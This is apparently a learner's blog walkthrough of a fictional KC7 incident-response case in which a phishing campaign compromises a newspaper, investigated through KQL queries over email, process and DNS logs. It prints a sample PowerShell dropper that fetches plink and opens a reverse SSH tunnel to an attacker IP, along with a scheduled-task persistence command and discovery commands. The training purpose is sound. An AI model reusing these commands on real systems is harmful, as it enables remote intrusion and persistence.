shoutvoid

Aspiring cybersecurity professional

A Scandal in Valdoria

The first in a series focusing on the fictional city of Valdoria, and the second of KC7's easiest cases. This time around, we take on the role of an incident responder, focusing on an attack against the Valdorian Times that led to the publication of an unapproved, slanderous article against a political candidate written and planted by hostile third parties. This case has a training guide containing lore and basic KQL tips.

⚠️ The remainder of this introduction contains spoilers on the case. You may skip this section with the navigation. ⚠️

As is often the case, a fairly simple phishing email with just-enough information to be convincing and to elicit curiosity is more than enough to cause trouble.

The easiest thing is to tut-tut at the Editorial Intern for their carelessness (it's 2025, stop opening arbitrary files from strangers!), but the Valdorian Times as an organization could've had additional security measures in place to avoid something like this happening. For instance, despite there being a SecurityAlerts table (ostensibly populated by security software such as a SIEM tool), the malicious file was not flagged in any device except 2 (belonging to two Directors of News Operations), despite being present in 8 other devices belonging to 8 distinct employees. There's also the fact that the malicious email even got past whatever email filtering is in place; it's admittedly a tricky thing to balance convenience (or just plain "allow people to do their jobs effectively") with security, but more fine-tuned rules could've been considered.

One also wonders what cybersecurity training has been given to the employees, if any.

And finally, setting more effective policies on employee devices to prevent the execution of any arbitrary, unauthorized binaries (such as plink.exe and curl.exe). Windows has a few mechanisms built in, actually: Software Restriction Policies (deprecated since Windows 10), AppLocker and Windows Defender Application Control.

Sections

Section 1 - KQL 101

Being a third party unrelated to the Valdorian Times prior to this incident, I decided to scope the organization itself before starting a proper investigation, using the following queries:

Employees
| count

There are 100 active employees in Valdorian Times; broken down by role:

Employees
| summarize count() by role
Query results
role count_
Journalism Intern 13
Legal Affairs Specialist 9
Marketing Strategist 9
Quality Control Editor 7
HR Specialist 7
Reporter and Writer 6
Sports Reporter 5
Congressional Reporter 5
IT Specialist 5
Staff Writer 5
Director of News Operations 5
Lead Investigative Reporter 4
Advertising Sales Representative 4
Editorial Writer 3
Political Correspondent 3
Cultural Journalist 2
Chief Executive Officer 1
Editorial Director 1
General Counsel 1
Editorial Intern 1
Chief Financial Officer 1
NewsPaper Printer 1
Chief Journalism Officer 1
Senior Editor 1

And finally, sorting by hire date:

Employees
| sort by hire_date

The earliest hire (and the only one of this year 2024) is a Ronnie McLovin, Editorial Intern.

Query Results
hire_date name user_agent ip_addr email_addr company_domain username role hostname
2024-01-02 08:00:00.0000 Ronnie McLovin Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 10.10.0.19 ronnie_mclovin@valdoriantimes.news valdoriantimes.news romclovin Editorial Intern A37A-DESKTOP

Section 2 - Welcome to Valdoria!

Valdorian Times, ideally, only publishes articles once the Editorial Director gives them their final stamp of approval. Valdorian Times' current and highly esteemed Editorial Director is Nene Leaks, who most people suspect of having something to do with the controversial article (or otherwise been highly irresponsible in their duties to let such an article pass).

After contacting Nene Leaks (the Editorial Director in question), she suggested I ask Newspaper Printer Clark Kent -- the person in charge of printing the paper after the article(s) are approved, and thus the last person who sees the articles before publication.

Clark Kent is distressed; he simply printed the article that was sent to him as he always does; this article was sent by Ronnie McLovin, the sole Editorial Intern and the newest hire (see [1] and [2]). I can't discount the possibility of an insider threat.

Ronnie McLovin confirms they were in charge of the OpEds on the mayoral candidates, but admits to have overslept and never sent the article. After telling Clark Kent of Ronnie's claims, he insists that Ronnie McLovin sent him an email on January 31st, 2024. We can confirm this:

Email
| where timestamp >= datetime(2024-01-31)
| where sender == "ronnie_mclovin@valdoriantimes.news"
and recipient == "clark_kent@valdoriantimes.news"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-31 11:11:12.0000 ronnie_mclovin@valdoriantimes.news ronnie_mclovin@valdoriantimes.news clark_kent@valdoriantimes.news URGENT: Final OpEd Draft Edits (Please publish the following article in tomorrow's paper)) CLEAN https://sharepoint.valdoriantimes.news/files/rmclovin/2024/OpEdFinal_to_print.docx

As claimed by Clark Kent, it was sent by Ronnie McLovin (the email matches down to the domain) and was uploaded to the Valdorian Times' official, internal SharePoint instance.

The file is OpEdFinal_to_print.docx and the subject line emphatises urgency. Ronnie remains adamant that she didn't sent the email and that the OpEd is not her work. Perhaps she is telling the truth.

Section 3 - Plenty of Phish

I was approached by an employee named Sonia Gose after a meeting with the Valdorian Times staff. She told me she had some information that may be relevant to the investigation.

Employees
| where name == "Sonia Gose"
Query Results
hire_date name user_agent ip_addr email_addr company_domain username role hostname
2018-11-17 11:45:25.0000 Sonia Gose Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 10.10.0.3 sonia_gose@valdoriantimes.news valdoriantimes.news sogose Senior Editor UL0M-MACHINE

Senior Editor Sonia Gose showed me a suspicious email she received a few weeks ago, on 2024-01-10 at 7:58 AM. The sender was newspaper_jobs@gmail.com, signed by Mike Smith of WeHireJournalists. Its subject line was [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent. The content of the body is reproduced below:

Hi, Sonia.

We are in search of Multimedia Journalists and we thought your experience was quite impressive. Would you consider applying? Click here to learn more about our open roles.

Sincerely.

Mike Smith
WeHireJournalists

After thanking Sonia Gose for this tip, I check her email logs:

Employees
| where name == "Sonia Gose"
| distinct email_addr
| lookup Email on $left.email_addr == $right.recipient
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
email_addr timestamp sender reply_to subject verdict link
sonia_gose@valdoriantimes.news 2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx

Interestingly, the date is five days earlier than what Sonia showed me. The URL points the domain promotionrecruit.com and a download for the file Valdorian_Times_Editorial_Offer_Letter.docx. Sonia doesn't remember if she did click the link or not. I can confirm it myself:

Employees
| where name == "Sonia Gose"
| distinct ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "promotionrecruit.com"
Query Results
ip_addr timestamp method user_agent url
10.10.0.3 2024-01-05 10:23:17.0000 GET Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx

And so she did; since this screams "phishing email" and "malicious attachment", I decide to investigate what the file could've done on Sonia's computer.

Employees
| where name == "Sonia Gose"
| distinct hostname
| lookup FileCreationEvents on $left.hostname == $right.hostname
| where filename =~ "Valdorian_Times_Editorial_Offer_Letter.docx"
Query Results
hostname timestamp username sha256 path filename process_name
UL0M-MACHINE 2024-01-05 10:24:04.0000 sogose 60b854332e393a6a2f0015383969c3ac705126a6b7829b762057a3994967a61f C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe

The file was saved to disk on 2024-01-05 at 10:24:04 in the morning, roughly 40 minutes after Sonia first received the email. VirusTotal doesn't return any results for this hash; this does not mean the file is safe.

I decide to check if the file was opened, and if so, check if anything strange happened.

Employees
| where name == "Sonia Gose"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp >= datetime(2024-01-05 10:24:04.0000)
and process_commandline !contains "WindowsApps"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
UL0M-MACHINE 2024-01-05 10:24:31.0000 Explorer.exe 952f6a02d32145816641a1469a3493106874635c0dbf77a53a91ee606b9e7aa5 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx" WINWORD.EXE d7890eb6d0a6e7c65d403bf9121fc76442b7397e4dad367be1720536526c4e06 sogose
UL0M-MACHINE 2024-01-05 10:24:32.0000 WINWORD.EXE 692ea0a131deceae887f86b85727cd5bdfa5bb3aa5be319251454467b5819ed8 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 e8be07fad6781e7ebce9492958353b868501ab9ad67ac8eeb43eb8c71e9786b3 sogose
UL0M-MACHINE 2024-01-05 11:22:44.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1" schtasks.exe e7534e5fc3af6bb3d24281e3d62bf11e46348a3471a0af815798a99e11405b3f sogose
UL0M-MACHINE 2024-01-05 11:55:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1 powershell.exe 865d238395aaf940d92ed7daac56f37314ddbdb60c2fe92b32412e4cf0609db1 sogose
UL0M-MACHINE 2024-01-06 02:39:35.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 136.130.190.181 cmd.exe bcd891f6ef905def30065ad2ef7df60d1283835b5435b5c484b8e08153686eee sogose
UL0M-MACHINE 2024-01-06 07:30:44.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe fb0868ac1091f8ab452cb8c09f0533b25281ec8e66f28c6943c5cb74308a3ab3 sogose
UL0M-MACHINE 2024-01-06 07:50:51.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ipconfig cmd.exe 8a95c4e25f60c0e0781313f0ff7be9e761f353ab445409ad7d889fa04879726d sogose
UL0M-MACHINE 2024-01-06 08:08:17.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f arp -a cmd.exe fe30cbba9c227352d511bceef30b8a950c9e8e03a42bbe73dc14cf6763d25409 sogose
UL0M-MACHINE 2024-01-06 09:06:30.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f tasklist /svc cmd.exe 17c580e3b7900b0e9445890af5d3c92178edaef52d790866158f364f4fc58dc2 sogose
UL0M-MACHINE 2024-01-06 09:17:51.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe c67d734c5a3cacaf6b468b48d626444e9d8cd51471036d381a0dc28ba43c2732 sogose

Immediately after Sonia Gose opened the document Valdorian_Times_Editorial_Offer_Letter.docx, a new file was created and executed: hacktivist_manifesto.ps1, a PowerShell script. After some investigation, I found a sample of what said PowerShell script looks like from the inside and is reproduced below; note that some information, such as the attacker's IP address, may not match what was used on the affected Valdorian Times' computers:

1 # Stealth Mode PowerShell Script to Invoke Plink and uncover da truth

[ASCII art expunged]

10 # green is a hackr color
11 $host.UI.RawUI.ForegroundColor = "Green"
12
13 # Define Plink URL and Destination Path
14 $plinkUrl = "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe"
15 $destinationPath = "C:\ProgramData\Temp\pLink.exe”
16
17 # let em know were here
18  Write-Host "lol ur bout 2 get pwnd..." -NoNewline
19 Start-Sleep -Seconds 2
20 Write-Host " Done."
21
22 # download plink and dont even be stealthy about it lol
23 Invoke-WebRequest -Uri $plinkUrl -OutFile $destinationPath
24
25 # make fun of the victim
26 Write-Host “loser haha :P" -NoNewline
27 Start-Sleep -Seconds 2
28  Write-Host " Ready."
29
30 # now run plink and get that juicy hands-on-keyboard babyyyyyyy
31 & $destinationPath -R 3389: localhost:3389 -ssh -1 $had@w -pw thruthW!l1S3tUfree 205.129.146.36

A rundown of what is going on in this code sample and in the previously-uncovered commands run on Sonia's computer (see [8]):

  1. The target opens the malicious file.
  2. The file drops (i.e creates) another file, a PowerShell script.
  3. The PowerShell script is executed without any user interaction beyond having opened the false document in step 1.
  4. The PowerShell script downloads and executes plink.exe, a CLI tool by the PuTTY team. As explained in the user guide, it's a tool for remote access to other devices.
  5. A scheduled task named Hacktivist Manifesto is created; the PowerShell script is set to execute every 5 hours. This ensures persistence.
  6. The PowerShell script is executed with the ExecutionPolicy flag set to Bypass; this means anything and everything will be executed without presenting warnings or prompts to the user. See the official documentation. This prevents the script from being discovered as easily.
  7. plink.exe is executed; a SSH connection is created on port 3389 between the attacker's device (IP address 136.130.190.181 in Sonia Gose's case) and the target's; the username is set as $had@w and the password is thruthW!l1S3tUfree [sic].
  8. The attacker now has control of the target computer.

In Sonia Gose's case, the attackers immediately ran discovery commands; a throughout examination of the recorded Process Events shows that they quickly lost interest in Sonia Gose, likely looking for bigger (or more exploitable) fish to fry in the Valdorian Times. The discovery commands were:

  1. whoami: Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name. [Microsoft Learn].
  2. ipconfig: Displays all current TCP/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Used without parameters, ipconfig displays Internet Protocol version 4 (IPv4) and IPv6 addresses, subnet mask, and default gateway for all adapters. [Microsoft Learn].
  3. arp -a: Displays and modifies entries in the Address Resolution Protocol (ARP) cache. The ARP cache contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. [...] To display the arp cache tables for all interfaces, use arp /a [Microsoft Learn].
  4. tasklist /svc: Displays a list of currently running processes on the local computer or on a remote computer. [/svc] [l]ists all the service information for each process without truncation. [Microsoft Learn].
  5. net view: Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain. [Microsoft Learn].

Since there is nothing else of interest in Sonia Gose's computer, we must investigate elsewhere. It's highly likely she wasn't the only target within the Valdorian Times.

Section 4 - A Scandal

Before digging deeper into some leads, such as the attacker's IP addresses, I scoped the problem across Valdorian Times:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
Query Results
timestamp hostname username sha256 path filename process_name
2024-01-03 07:06:20.0000 LZD4-DESKTOP mazuckerberg 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:12:43.0000 CORG-DESKTOP kahopper 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:21:26.0000 O5HM-MACHINE idtarbell 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:22:45.0000 C0MC-MACHINE lapage 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 07:35:24.0000 Q8CS-LAPTOP peparket 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-03 08:48:44.0000 PPKQ-LAPTOP neleaks 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 09:57:10.0000 ER9X-DESKTOP cabernstein 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:02:25.0000 LSL7-DESKTOP bowoodward 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:24:32.0000 UL0M-MACHINE sogose 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-05 10:37:15.0000 RBLC-LAPTOP darather 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-08 08:06:19.0000 3FUX-MACHINE chniles 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-08 10:53:58.0000 8E37-LAPTOP litorvalds 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:10:47.0000 ZSD1-MACHINE tobrokaw 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:36:43.0000 1OD0-MACHINE bawalters 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 08:53:05.0000 W4PH-DESKTOP bigates 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-09 09:37:05.0000 JJ2F-MACHINE tybyers 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 08:55:51.0000 A37A-DESKTOP romclovin 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 09:04:39.0000 KOVZ-DESKTOP sehersh 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-10 09:41:37.0000 KOVZ-DESKTOP sehersh 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-12 11:39:29.0000 FQEI-LAPTOP crzimmerman 0e7e0e888f22b5cc83ce5f2560f9f331d89b8e02875e98ace822e074f2ee486b C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-15 08:54:39.0000 WOJY-LAPTOP kebut 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe
2024-01-15 09:38:11.0000 MVBT-MACHINE stjobs 1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 explorer.exe

The hacktivist_manifesto.ps1 file is present across 22 hostnames, 21 distinct (Lead Investigative Reporter Seymour Herst had it dropped twice). The specific employees affected were:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
| distinct hostname
| lookup Employees on $left.hostname == $right.hostname
Query Results
hostname hire_date name user_agent ip_addr email_addr company_domain username role
KOVZ-DESKTOP 2014-06-13 07:42:03.0000 Seymour Hersh Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.63 seymour_hersh@valdoriantimes.news valdoriantimes.news sehersh Lead Investigative Reporter
C0MC-MACHINE 2014-08-03 19:10:00.0000 Larry Page Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Win64; x64; Trident/5.0) 10.10.0.97 larry_page@valdoriantimes.news valdoriantimes.news lapage IT Specialist
LZD4-DESKTOP 2014-08-25 17:19:29.0000 Mark Zuckerberg Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 10.10.0.84 mark_zuckerberg@valdoriantimes.news valdoriantimes.news mazuckerberg IT Specialist
1OD0-MACHINE 2014-09-11 05:57:06.0000 Barbara Walters Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0 10.10.0.24 barbara_walters@valdoriantimes.news valdoriantimes.news bawalters Director of News Operations
MVBT-MACHINE 2014-09-29 01:15:42.0000 Steve Jobs Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.16 steve_jobs@valdoriantimes.news valdoriantimes.news stjobs IT Specialist
FQEI-LAPTOP 2014-12-24 07:45:33.0000 Craig Zimmerman Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 10.10.0.8 craig_zimmerman@valdoriantimes.news valdoriantimes.news crzimmerman Congressional Reporter
CORG-DESKTOP 2015-06-24 21:20:30.0000 Kathleen Hopper Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Win64; x64; Trident/4.0) 10.10.0.21 kathleen_hopper@valdoriantimes.news valdoriantimes.news kahopper Congressional Reporter
RBLC-LAPTOP 2016-04-03 15:39:01.0000 Dan Rather Mozilla/5.0 (Windows NT 6.2; rv:50.0) Gecko/20100101 Firefox/50.0 10.10.0.39 dan_rather@valdoriantimes.news valdoriantimes.news darather Director of News Operations
Q8CS-LAPTOP 2016-11-18 02:04:16.0000 Peter Parket Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.78 Safari/537.36 10.10.0.9 peter_parket@valdoriantimes.news valdoriantimes.news peparket Director of News Operations
O5HM-MACHINE 2017-08-16 21:40:56.0000 Ida Tarbell Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Safari/537.36 10.10.0.82 ida_tarbell@valdoriantimes.news valdoriantimes.news idtarbell Lead Investigative Reporter
LSL7-DESKTOP 2018-03-17 04:04:03.0000 Bob Woodward Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 10.10.0.48 bob_woodward@valdoriantimes.news valdoriantimes.news bowoodward Lead Investigative Reporter
UL0M-MACHINE 2018-11-17 11:45:25.0000 Sonia Gose Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 10.10.0.3 sonia_gose@valdoriantimes.news valdoriantimes.news sogose Senior Editor
ZSD1-MACHINE 2018-12-30 09:58:33.0000 Tom Brokaw Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 10.10.0.76 tom_brokaw@valdoriantimes.news valdoriantimes.news tobrokaw Director of News Operations
PPKQ-LAPTOP 2019-08-26 02:52:07.0000 Nene Leaks Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/4.0) 10.10.0.17 nene_leaks@valdoriantimes.news valdoriantimes.news neleaks Editorial Director
ER9X-DESKTOP 2021-09-27 06:55:44.0000 Carl Bernstein Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) 10.10.0.59 carl_bernstein@valdoriantimes.news valdoriantimes.news cabernstein Lead Investigative Reporter
3FUX-MACHINE 2022-08-19 14:57:34.0000 Chad Niles Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) 10.10.0.53 chad_niles@valdoriantimes.news valdoriantimes.news chniles Congressional Reporter
8E37-LAPTOP 2022-10-16 20:34:04.0000 Linus Torvalds Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 10.10.0.79 linus_torvalds@valdoriantimes.news valdoriantimes.news litorvalds IT Specialist
W4PH-DESKTOP 2022-12-07 16:24:56.0000 Bill Gates Mozilla/5.0 (Windows NT 5.1; rv:46.0) Gecko/20100101 Firefox/46.0 10.10.0.34 bill_gates@valdoriantimes.news valdoriantimes.news bigates IT Specialist
JJ2F-MACHINE 2023-04-09 18:43:57.0000 Tyler Byers Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko 10.10.0.52 tyler_byers@valdoriantimes.news valdoriantimes.news tybyers Congressional Reporter
WOJY-LAPTOP 2023-08-02 23:29:00.0000 Kenneth But Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; WOW64; Trident/6.0) 10.10.0.14 kenneth_but@valdoriantimes.news valdoriantimes.news kebut Congressional Reporter
A37A-DESKTOP 2024-01-02 08:00:00.0000 Ronnie McLovin Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 10.10.0.19 ronnie_mclovin@valdoriantimes.news valdoriantimes.news romclovin Editorial Intern

And distributed across the following roles:

FileCreationEvents
| where filename =~ "hacktivist_manifesto.ps1"
| distinct hostname
| lookup Employees on $left.hostname == $right.hostname
| summarize count() by role
Query Results
role count_
IT Specialist 5
Congressional Reporter 5
Director of News Operations 4
Lead Investigative Reporter 4
Editorial Intern 1
Editorial Director 1
Senior Editor 1

Among the affected are Editorial Intern Ronnie McLovin and Editorial Director Nene Leaks. Since the article -- not written by Ronnie McLovin by her own admission, and not reviewed and approved by Nene Leaks -- came from Ronnie's email address, it's likely that after the attackers established an SSH tunnel with plink they used Ronnie's accounts and device to plant the article.

Before going any further, I'd like to check what domains and other IP addresses the attacker might've used in their campaign against the Valdorian Times.

PassiveDns
| where ip == "136.130.190.181" //to check what domains are associated with the known IP

PassiveDns
| where ip == "136.130.190.181"
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain //to check what other IPs might be used
| distinct ip

The sole domain is promotion-hire.info. Doing the opposite search reveals that the only IP address used by the attackers in this campaign is 136.130.190.181. However, Sonia Gose got an email with a link to promotionrecruit.com. Surprisingly, PassiveDns returns nothing when looking it up.

Before digging deeper into Ronnie McLovin's system, I wanted to check what other emails there might exist associated with the campaign. I already know 21 distinct employees downloaded the malicious .docx file, but maybe others got emails and never downloaded or opened the file; maybe there are more clues to who the threat actors are.

Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com sonia_gose@valdoriantimes.news [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-07 09:56:06.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com linus_torvalds@valdoriantimes.news [EXTERNAL] Your Chance to Shape the News: Current Openings in Investigative Journalism SUSPICIOUS https://promotionrecruit.com/files/public/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com chad_niles@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx

